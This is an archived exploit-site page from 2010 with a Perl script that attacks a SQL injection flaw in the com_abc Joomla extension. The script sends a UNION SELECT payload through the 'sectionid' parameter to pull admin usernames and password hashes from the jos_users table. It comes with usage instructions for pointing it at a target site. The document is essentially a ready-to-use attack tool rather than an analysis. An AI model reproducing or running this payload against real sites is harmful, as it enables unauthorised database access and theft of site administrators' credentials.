Home / os / win7

Joomla ABC Extension com_abc SQL Injection Exploit

Posted on 27 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla ABC Extension com_abc SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================== Joomla ABC Extension com_abc SQL Injection Exploit ================================================== #!/usr/bin/perl #***********************************************************************# # # # [o] ABC Joomla Extension SQL Injection Exploit # # Software : com_abc version 1.1.7 # # Vendor : http://www.airiny.com/ # # Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] # # Contact : public[at]antisecurity[dot]org # # Home : http://antisecurity.org/ # # # # [o] Usage # # root@evilc0de:~# perl abc.pl www.target.com # # # # [o] Greetz # # Angela Zhang stardustmemory aJe martfella pizzyroot Genex # # H312Y yooogy mousekill }^-^{ noname matthews wishnusakti # # skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 # # # # [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia # # # #***********************************************************************# use HTTP::Request; use LWP::UserAgent; my $target = $ARGV[0]; my $file_vuln = '/index.php?option=com_abc&amp;view=abc&amp;letter=AS&amp;sectionid='; my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--'; print &quot; [x]===============================================[x] &quot;; print &quot;[x] ABC Joomla Extension SQL Injection Exploit [x] &quot;; print &quot;[x] [C]oded By AntiSecurity [x] &quot;; print &quot;[x]===============================================[x] &quot;; my $exploit = &quot;http://&quot;.$target.$file_vuln.$sql_query; my $request = HTTP::Request-&gt;new(GET=&gt;$exploit); my $useragent = LWP::UserAgent-&gt;new(); $useragent-&gt;timeout(10); my $response = $useragent-&gt;request($request); if ($response-&gt;is_success) { my $res = $response-&gt;content; if ($res =~ m/:(.*):(.*):/g) { my ($username,$password) = ($1,$2); print &quot;[+] $username:$password &quot;; } else { print &quot;[-] Error, Fail to get admin login. &quot;; } } else { print &quot;[-] Error, &quot;.$response-&gt;status_line.&quot; &quot;; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP